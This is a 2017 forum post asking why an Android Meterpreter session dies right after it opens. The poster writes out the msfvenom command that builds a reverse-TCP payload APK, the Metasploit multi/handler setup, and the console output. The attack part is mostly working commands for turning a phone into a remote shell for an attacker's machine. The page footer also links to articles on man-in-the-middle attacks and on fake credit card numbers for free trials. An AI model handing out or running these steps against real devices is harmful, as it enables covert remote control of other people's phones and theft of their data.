Meterpreter on Android

Aug 31, 2017 03:34 PM

Hi,

I'm looking for help in order to progress in my understanding of the use of Meterpreter over Android on a smartphone.

I currently have Kali 4.11 and the Metasploit suite on the attacker computer.

I also generated my Meterpreter payloadusing the following command :

msfvenom -p android/meterpreter/reverse_tcp LHOST=MY_WAN_IP_ADDRESS LPORT=4444 -a dalvik --platform android R -o /pentest-001.apk

Then I installed my payload over the Android 6.0.1 smartphone (a Lenovo P2) and I can see the MainActivity software installed.

Then, on the Attacker computer", I typed (see bold) :

msf > use exploit/multi/handler

msf exploit(handler) > set payload android/meterpreter/reverse_tcp

payload => android/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST MY_LAN_IP_ADDRESS

LHOST => MY_LAN_IP_ADDRESS

msf exploit(handler) > set LPORT 4444

LPORT => 4444

msf exploit(handler) > exploit

* Exploit running as background job 0.

From ther, I start MainActivity on my smartphone (connected using 4G/LTE) : I can see the following being printed on the attacker computer.

msf exploit(handler) >

* Sending stage (68925 bytes) to MY_WAN_IP_ADDRESS

* Meterpreter session 1 opened (MY_LAN_IP_ADDRESS:4444 -> MY_WAN_IP_ADDRESS:11501) at 2017-08-31 13:55:56 +0200

* negotiating tlv encryption

* negotiated tlv encryption

* negotiated tlv encryption

* MY_WAN_IP_ADDRESS - Meterpreter session 1 closed. Reason: Died

I can repeat the operation on and on, I never get the Meterpreter shell. I tried on different smartphones, BTW.

One precision : my attacker computer is behind 2 routers: Both routers forward port 4444 (first one forward to 2nd router, and 2nd router forwards to MY_LAN_IP_ADDRESS)

I also tested using port 443.

Thanks in advance for your help.

Related Articles

637587411395252764.jpg

How to Perform Advanced Man-in-the-Middle Attacks with Xerosploit

635211718118959676.jpg

How to Get Unlimited Free Trials Using a "Real" Fake Credit Card Number

Comments

No Comments Exist

Be the first, drop a comment!